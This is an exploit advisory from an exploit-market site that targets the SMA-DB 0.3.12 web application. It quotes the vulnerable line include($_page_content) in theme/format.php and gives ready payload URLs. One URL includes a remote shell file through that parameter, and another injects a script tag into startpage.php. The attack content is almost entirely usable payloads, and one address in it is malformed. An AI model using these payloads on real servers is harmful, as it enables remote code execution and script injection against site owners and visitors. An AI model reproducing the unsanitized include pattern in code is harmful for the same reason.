[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SMA-DB 0.3.12 (RFI/XSS) Multiple Remote Vulnerabilities

Author
ahmadbady
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4766
Category
web applications
Date add
02-02-2009
Platform
unsorted
=======================================================
SMA-DB 0.3.12 (RFI/XSS) Multiple Remote Vulnerabilities
=======================================================



-----------------:Remote File Include/cross site script:-----------------

script:SMA-DB v0.3.12
   
------------------------------------------------------------------
download from:http://bluevirus.ch/media/downloads/SMA-DB_v0.3.12.zip
   
------------------------------------------------------------------
........................................................
vul:/theme/format.php


<?php include($_page_content);?> line 49

------------------------------------------------------
-----------------------------------------------------
xpl:

http://127.0..0.1/path/theme/format.php?_page_content=[shell.txt?]

xss:
http://127.0.0.1/path/startpage.php/>"><ScRiPt>alert(0)</ScRiPt>

***************************************************
***************************************************
---------------------------------------------------



#  0day.today [2024-12-25]  #